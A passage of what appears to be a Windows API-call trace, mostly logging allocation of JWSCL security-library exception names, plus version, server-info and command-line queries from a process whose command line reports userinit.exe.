[0090.504] SysReAllocStringLen (in: pbstr=0x2a3fa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x2a3fa50*="EJwsclShellExecuteException") returned 1
[0090.504] SysReAllocStringLen (in: pbstr=0x2a3fa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x2a3fa38*="EJwsclElevationException") returned 1
[0090.504] SysReAllocStringLen (in: pbstr=0x2a3fa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x2a3fa20*="EJwsclAbortException") returned 1
[0090.504] SysReAllocStringLen (in: pbstr=0x2a3fa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x2a3fa08*="EJwsclSuRunErrorException") returned 1
[0090.504] SysReAllocStringLen (in: pbstr=0x2a3f9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x2a3f9f0*="EJwsclElevateProcessException") returned 1
[0090.504] SysReAllocStringLen (in: pbstr=0x2a3f9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x2a3f9d8*="EJwsclCertApiException") returned 1
[0090.504] SysReAllocStringLen (in: pbstr=0x2a3f9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x2a3f9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0090.504] SysReAllocStringLen (in: pbstr=0x2a3f9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x2a3f9a8*="EJwsclInvalidStartupInfo") returned 1
[0090.504] SysReAllocStringLen (in: pbstr=0x2a3f990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x2a3f990*="EJwsclFirewallNoExceptionsException") returned 1
[0090.504] SysReAllocStringLen (in: pbstr=0x2a3f978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x2a3f978*="EJwsclFirewallInactiveException") returned 1
[0090.504] SysReAllocStringLen (in: pbstr=0x2a3f960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x2a3f960*="EJwsclFirewallDelRuleException") returned 1
[0090.504] SysReAllocStringLen (in: pbstr=0x2a3f948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x2a3f948*="EJwsclAddUdpPortToFirewallException") returned 1
[0090.504] SysReAllocStringLen (in: pbstr=0x2a3f930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x2a3f930*="EJwsclAddTcpPortToFirewallException") returned 1
[0090.504] SysReAllocStringLen (in: pbstr=0x2a3f918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x2a3f918*="EJwsclFirewallAddRuleException") returned 1
[0090.504] SysReAllocStringLen (in: pbstr=0x2a3f900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a3f900*="EJwsclSetRemoteAdminAdressException") returned 1
[0090.504] SysReAllocStringLen (in: pbstr=0x2a3f8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a3f8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a3f8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a3f8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a3f8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a3f888*="EJwsclGetIncomingPingAllowedException") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a3f870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a3f858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x2a3f840*="EJwsclGetFWStateException") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x2a3f828*="EJwsclSetFWStateException") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x2a3f810*="EJwsclFirewallProfileInitException") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x2a3f7f8*="EJwsclFirewallInitException") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x2a3f7e0*="EJwsclGenericFirewallException") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x2a3f7c8*="EJwsclEnumerateProcessFailed") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x2a3f7b0*="EJwsclInvalidRegistryPath") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x2a3f798*="EJwsclEndOfStream") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x2a3f780*="EJwsclClassTypeMismatch") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x2a3f768*="EJwsclInvalidHandle") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x2a3f750*="EJwsclInvalidIndex") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x2a3f738*="EJwsclInvalidSession") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x2a3f720*="EJwsclMissingEvent") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x2a3f708*="EJwsclInvalidPointerType") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x2a3f6f0*="EJwsclCreateProcessFailed") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x2a3f6d8*="EJwsclNilPointer") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x2a3f6c0*="EJwsclUnimplemented") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x2a3f6a8*="EJwsclInitWellKnownException") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x2a3f690*="EJwsclKeyApiException") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x2a3f678*="EJwsclKeyException") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x2a3f660*="EJwsclHashApiException") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x2a3f648*="EJwsclHashException") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x2a3f630*="EJwsclCSPApiException") returned 1
[0090.505] SysReAllocStringLen (in: pbstr=0x2a3f618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x2a3f618*="EJwsclCSPException") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x2a3f600*="EJwsclTerminalSessionException") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x2a3f5e8*="EJwsclTerminalServiceNecessary") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x2a3f5d0*="EJwsclTerminalServiceException") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x2a3f5b8*="EJwsclTerminalServerConnectException") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x2a3f5a0*="EJwsclTerminalServerException") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x2a3f588*="EJwsclCryptUnsupportedException") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x2a3f570*="EJwsclCryptApiException") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x2a3f558*="EJwsclCryptException") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x2a3f540*="EJwsclOSError") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x2a3f528*="EJwsclResourceInitFailed") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x2a3f510*="EJwsclResourceUnequalCount") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x2a3f4f8*="EJwsclResourceNotFound") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x2a3f4e0*="EJwsclResourceException") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x2a3f4c8*="EJwsclFailedAddACE") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x2a3f4b0*="EJwsclUnsupportedACE") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x2a3f498*="EJwsclOpenWindowStationException") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x2a3f480*="EJwsclWindowStationException") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x2a3f468*="EJwsclCloseDesktopException") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x2a3f450*="EJwsclCreateDesktopException") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x2a3f438*="EJwsclOpenDesktopException") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x2a3f420*="EJwsclDesktopException") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x2a3f408*="EJwsclSACLAccessDenied") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x2a3f3f0*="EJwsclAccessDenied") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x2a3f3d8*="EJwsclLSAException") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x2a3f3c0*="ESetOwnerException") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x2a3f3a8*="ESetSecurityException") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x2a3f390*="EJwsclInvalidParentDescriptor") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x2a3f378*="EJwsclInvalidKeyPath") returned 1
[0090.506] SysReAllocStringLen (in: pbstr=0x2a3f360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x2a3f360*="EJwsclInvalidGenericAccessMask") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x2a3f348*="EJwsclAdaptSecurityInfoException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x2a3f330*="EJwsclThreadException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x2a3f318*="EJwsclInvalidObjectException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x2a3f300*="EJwsclSecurityObjectException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x2a3f2e8*="EJwsclHashMismatch") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x2a3f2d0*="EJwsclStreamHashException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x2a3f2b8*="EJwsclStreamInvalidMagicException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x2a3f2a0*="EJwsclStreamSizeException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x2a3f288*="EJwsclStreamException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x2a3f270*="EJwsclNoSuchLogonSession") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x2a3f258*="EJwsclInvalidFlagsException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x2a3f240*="EJwsclProcessNotFound") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x2a3f228*="EJwsclInvalidParameterException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x2a3f210*="EJwsclInvalidPathException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x2a3f1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x2a3f1e0*="EJwsclInvalidRevision") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x2a3f1c8*="EJwsclInvalidAceMismatch") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x2a3f1b0*="EJwsclRevisionMismatchException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x2a3f198*="EJwsclInvalidACEException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x2a3f180*="EJwsclReadOnlyPropertyException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x2a3f168*="EJwsclDuplicateListEntryException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x2a3f150*="EJwsclIndexOutOfBoundsException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x2a3f138*="EJwsclInvalidSidAuthorityValue") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x2a3f120*="EJwsclInvalidKnownSIDException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x2a3f108*="EJwsclInvalidComputer") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x2a3f0f0*="EJwsclInvalidGroupSIDException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x2a3f0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x2a3f0c0*="EJwsclInvalidSIDException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x2a3f0a8*="EJwsclInvalidSecurityListException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x2a3f090*="EJwsclInvalidMandatoryLevelException") returned 1
[0090.507] SysReAllocStringLen (in: pbstr=0x2a3f078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x2a3f078*="EJwsclEmptyACLException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3f060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x2a3f060*="EJwsclNILParameterException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3f048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x2a3f048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3f030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x2a3f030*="EJwsclInvalidObjectArrayException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3f018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x2a3f018*="EJwsclProcessIdNotAvailable") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3f000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x2a3f000*="EJwsclWinCallFailedException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3efe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x2a3efe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3efd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x2a3efd0*="EJwsclNotImplementedException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3efb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x2a3efb8*="EJwsclAccessTypeException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3efa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x2a3efa0*="EJwsclAdjustPrivilegeException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3ef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x2a3ef88*="EJwsclPrivilegeCheckException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3ef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x2a3ef70*="EJwsclPrivilegeNotFoundException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3ef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x2a3ef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3ef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x2a3ef40*="EJwsclPrivilegeException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3ef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x2a3ef28*="EJwsclNotEnoughMemory") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3ef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x2a3ef10*="EJwsclInvalidTokenHandle") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3eef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x2a3eef8*="EJwsclNoThreadTokenAvailable") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3eee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x2a3eee0*="EJwsclDuplicateTokenException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3eec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x2a3eec8*="EJwsclInvalidOwnerException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3eeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x2a3eeb0*="EJwsclInvalidPrimaryToken") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3ee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x2a3ee98*="EJwsclTokenPrimaryException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3ee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x2a3ee80*="EJwsclTokenImpersonationException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3ee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x2a3ee68*="EJwsclTokenInformationException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3ee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x2a3ee50*="EJwsclSharedTokenException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3ee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x2a3ee38*="EJwsclOpenProcessTokenException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3ee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x2a3ee20*="EJwsclOpenThreadTokenException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3ee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x2a3ee08*="EJwsclSecurityException") returned 1
[0090.508] SysReAllocStringLen (in: pbstr=0x2a3edf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x2a3edf0*="Exception") returned 1
[0090.508] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.509] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0090.509] GetVersionExA (in: lpVersionInformation=0x14f764*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x290000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\x8c\xf7\x14") | out: lpVersionInformation=0x14f764*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0090.509] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0090.509] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0090.514] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0090.514] NetServerGetInfo (in: servername="", level=0x65, bufptr=0x14f7e8 | out: bufptr=0x14f7e8) returned 0x0
[0090.534] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0090.534] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0090.534] NetApiBufferFree (Buffer=0x2b1d00) returned 0x0
[0090.534] SetErrorMode (uMode=0x8000) returned 0x1
[0090.534] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0090.535] SetErrorMode (uMode=0x1) returned 0x8000
[0090.535] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0090.536] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0090.538] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0090.540] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0090.541] SysReAllocStringLen (in: pbstr=0x2a3ec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3ec40*="DELETE") returned 1
[0090.541] SysReAllocStringLen (in: pbstr=0x2a3ec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3ec30*="READ_CONTROL") returned 1
[0090.541] SysReAllocStringLen (in: pbstr=0x2a3ec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3ec20*="WRITE_OWNER") returned 1
[0090.541] SysReAllocStringLen (in: pbstr=0x2a3ec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3ec10*="WRITE_DAC") returned 1
[0090.541] SysReAllocStringLen (in: pbstr=0x2a3ec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x2a3ec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0090.541] SysReAllocStringLen (in: pbstr=0x2a3ebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x2a3ebf0*="FILE_READ_ATTRIBUTES") returned 1
[0090.541] SysReAllocStringLen (in: pbstr=0x2a3ebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x2a3ebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0090.541] SysReAllocStringLen (in: pbstr=0x2a3ebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x2a3ebd0*="FILE_WRITE_DATA") returned 1
[0090.541] SysReAllocStringLen (in: pbstr=0x2a3ebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x2a3ebc0*="FILE_READ_DATA") returned 1
